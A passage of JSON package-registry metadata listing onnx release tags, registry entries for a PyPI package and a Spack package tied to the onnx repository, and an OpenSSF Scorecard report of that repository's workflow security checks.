.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2025-10-27T18:39:38.438Z","dependent_packages_count":0,"downloads":null,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":57.31939644547326,"dependent_packages_count":10.184615334385729,"stargazers_count":0.34260270328059633,"forks_count":0.2921671457228525,"docker_downloads_count":null,"average":17.034695407215608},"purl":"pkg:pypi/tenzro-serve","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/tenzro-serve","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/tenzro-serve","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/tenzro-serve/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-25T16:00:29.826Z","issues_count":1002,"pull_requests_count":2088,"avg_time_to_close_issue":24651025.396024466,"avg_time_to_close_pull_request":3750894.192264574,"issues_closed_count":653,"pull_requests_closed_count":1784,"pull_request_authors_count":174,"issue_authors_count":605,"avg_comments_per_issue":2.6766467065868262,"avg_comments_per_pull_request":1.985632183908046,"merged_pull_requests_count":1448,"bot_issues_count":5,"bot_pull_requests_count":386,"past_year_issues_count":201,"past_year_pull_requests_count":1024,"past_year_avg_time_to_close_issue":1563078.0,"past_year_avg_time_to_close_pull_request":426840.47297297296,"past_year_issues_closed_count":79,"past_year_pull_requests_closed_count":814,"past_year_pull_request_authors_count":69,"past_year_issue_authors_count":120,"past_year_avg_comments_per_issue":1.5621890547263682,"past_year_avg_comments_per_pull_request":1.6904296875,"past_year_bot_issues_count":5,"past_year_bot_pull_requests_count":186,"past_year_merged_pull_requests_count":706,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":435,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"}],"active_maintainers":[{"login":"andife","count":332,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"take-cheeze","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/tenzro-serve/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/tenzro-serve/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/tenzro-serve/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/tenzro-serve/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/tenzro-serve/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/tenzro-serve/codemeta","maintainers":[{"uuid":"hilalagil","login":"hilalagil","name":null,"email":null,"url":null,"packages_count":5,"html_url":"https://pypi.org/user/hilalagil/","role":"Owner","created_at":"2024-10-17T08:30:23.473Z","updated_at":"2024-10-17T08:30:23.473Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/hilalagil/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":890698,"maintainers_count":381518,"namespaces_count":0,"keywords_count":289179,"github":"pypi","metadata":{"funded_packages_count":54301},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-06-10T05:13:28.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":74297,"name":"onnx","ecosystem":"spack","description":"Open Neural Network Exchange (ONNX). ONNX provides an open source format\nfor AI models, both deep learning and traditional ML. It defines an\nextensible computation graph model, as well as definitions of built-in\noperators and standard data types.\n","homepage":"https://github.com/onnx/onnx","licenses":"[]","normalized_licenses":["Other"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":14,"first_release_published_at":"2022-04-05T09:19:42.231Z","latest_release_published_at":"2022-04-05T09:19:42.231Z","latest_release_number":"1.10.1","last_synced_at":"2026-06-07T07:16:07.261Z","created_at":"2022-04-05T09:19:42.203Z","updated_at":"2026-06-07T07:16:07.262Z","registry_url":"https://packages.spack.io/package.html?name=onnx","install_command":"spack install onnx","documentation_url":null,"metadata":{},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2025-10-27T15:22:48.000Z","size":44729,"stargazers_count":19779,"open_issues_count":283,"forks_count":3816,"subscribers_count":426,"default_branch":"main","last_synced_at":"2025-10-27T17:28:08.029Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2025-10-27T15:22:58.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":35,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by 